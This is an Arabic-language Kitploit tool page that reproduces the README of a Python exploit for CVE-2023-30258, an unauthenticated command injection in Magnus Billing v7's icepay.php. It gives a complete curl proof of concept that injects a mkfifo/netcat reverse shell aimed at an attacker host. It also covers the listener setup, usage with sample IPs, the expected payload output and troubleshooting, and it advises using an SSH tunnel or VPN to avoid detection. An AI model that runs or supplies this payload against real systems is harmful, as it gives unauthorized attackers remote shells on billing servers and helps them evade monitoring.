Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-30258-magnus-billing-v7-exploit — استغلال Python آلي لـ CVE-2023-30258، حقن أوامر في نظام Magnus Billing v7. يرسل طلب GET مخصص إلى icepay.php لتنفيذ أوامر تعسفية وإنشاء شل عكسي. | Kitploit
أدوات/GitHubGitHub/tinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubtinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit

CVE-2023-30258-magnus-billing-v7-exploit

استغلال Python آلي لـ CVE-2023-30258، حقن أوامر في نظام Magnus Billing v7. يرسل طلب GET مخصص إلى icepay.php لتنفيذ أوامر تعسفية وإنشاء شل عكسي.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
71منذ سنة واحدةلم تتم المراجعة بعد

استغلال Magnus Billing System v7

تقوم هذه الأداة النصية بلغة بايثون بأتمتة استغلال ثغرة حقن الأوامر في نظام Magnus Billing الإصدار 7، وتحديداً في ملف icepay.php الموجود في المسار /mbilling/lib/icepay/icepay.php. يستغل الاستغلال المعامل democ لتنفيذ أوامر عشوائية على النظام المستهدف، مما يؤدي في النهاية إلى إنشاء صدفة عكسية (reverse shell) على جهاز المهاجم.

نظرة عامة على الثغرة

تسمح الثغرة بحقن الأوامر دون مصادقة عبر طلب GET مصمم خصيصًا. استخدم الإثبات الأولي للمفهوم (PoC) الأمر curl التالي:

root@kitploit:~
curl -s 'http://<TARGET_IP>/mbilling/lib/icepay/icepay.php' --get --data-urlencode 'democ=;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ATTACKER_IP> <PORT> >/tmp/f;'

تقوم هذه الأداة بأتمتة هذه العملية، مما يجعلها قابلة للتكوين عبر وسائط سطر الأوامر.

الميزات

  • قابلة للتكوين: حدد IP الهدف و IP المهاجم والمنفذ عبر وسائط سطر الأوامر
  • بسيطة: تستخدم مكتبة requests لإرسال طلب HTTP مع الحمولة
  • تغذية راجعة: توفر مخرجات واضحة لتتبع تقدم الاستغلال

المتطلبات الأساسية

  • Python 3.x: تأكد من تثبيت Python 3 على نظامك
  • مكتبة الطلبات: قم بتثبيت وحدة Python requests:
    root@kitploit:~
    pip install requests
    
  • Netcat: يجب أن يكون netcat (nc) مثبتًا على النظام المستهدف لكي تعمل الصدفة العكسية
  • مستمع: قم بإعداد مستمع netcat على جهاز المهاجم لاستقبال الصدفة العكسية
  • هدف معرض للخطر: يجب أن يكون النظام المستهدف يعمل بنظام Magnus Billing v7 مع إمكانية الوصول إلى ملف icepay.php المعرض للخطر

الاستخدام

الإعداد

  1. استنساخ أو تنزيل: احفظ السكربت باسم exploit.py
  2. إعداد المستمع: على جهاز المهاجم، ابدأ مستمع netcat:
    root@kitploit:~
    nc -lvnp <PORT>
    
    استبدل <PORT> بالمنفذ الذي اخترته (مثل 443)

تشغيل الاستغلال

root@kitploit:~
python exploit.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>

المعاملات:

  • -t, --target: عنوان IP لنظام Magnus Billing المستهدف
  • -a, --attacker: عنوان IP الخاص بك لاستقبال الصدفة العكسية
  • -p, --port: المنفذ على جهازك للصدفة العكسية

مثال

root@kitploit:~
python exploit.py -t 10.10.160.86 -a 10.8.64.79 -p 443

المخرجات المتوقعة:

root@kitploit:~
=== Magnus Billing System v7 Exploit ===
Command Injection via icepay.php - Reverse Shell
=======================================
[+] Targeting: http://10.10.160.86/mbilling/lib/icepay/icepay.php
[+] Attacker: 10.8.64.79:443
[+] Sending payload: ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.64.79 443 >/tmp/f;
[+] Request sent successfully!
[*] Check your netcat listener (e.g., 'nc -lvnp 443') for a shell.
  1. استلام الصدفة: انتقل إلى مستمع netcat الخاص بك للتفاعل مع الصدفة العكسية إذا نجحت

ملاحظات تقنية

  • نوع الحمولة: يستخدم السكربت صدفة عكسية تعتمد على FIFO (mkfifo) مع netcat
  • معالجة الأخطاء: يتضمن فحوصات أساسية لأخطاء الشبكة والمنافذ غير الصالحة
  • التصحيح: لفحص استجابة الخادم، قم بإلغاء تعليق السطر print(response.text) في دالة exploit()
  • حمولات بديلة: يمكن تعديل السكربت لاستخدام حمولات صدفة عكسية مختلفة إذا لزم الأمر

استكشاف الأخطاء وإصلاحها

  • إذا فشل الاتصال، تحقق من أن:
    • النظام المستهدف يحتوي على netcat مثبتًا
    • لا يوجد جدار ناري يحظر الاتصال
    • المنافذ الصحيحة قيد الاستخدام
    • لم يتم تصحيح الثغرة على الهدف

اعتبارات أمنية

  • فكر في استخدام نفق SSH أو VPN عند استخدام هذا الاستغلال لتجنب الكشف
  • قد تؤدي الحمولة إلى تشغيل أنظمة مراقبة أمنية

إخلاء المسؤولية

هذه الأداة مقدمة لأغراض تعليمية واختبار أمني فقط. استخدمها فقط على الأنظمة التي لديك إذن صريح لاختبارها. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك موافقة على اختبارها غير قانوني وغير أخلاقي. المؤلف غير مسؤول عن أي سوء استخدام أو ضرر ناتج عن هذا السكربت.

الترخيص

تم إصدار هذا المشروع بموجب رخصة MIT. لا تتردد في تعديله وتوزيعه حسب الحاجة، مع الاحتفاظ بإخلاء المسؤولية.

المساهمة

نرحب بالمساهمات وتقارير الأخطاء وطلبات الميزات. لا تتردد في تقديم طلب سحب (pull request) أو فتح مشكلة (issue).

تنزيل الأداة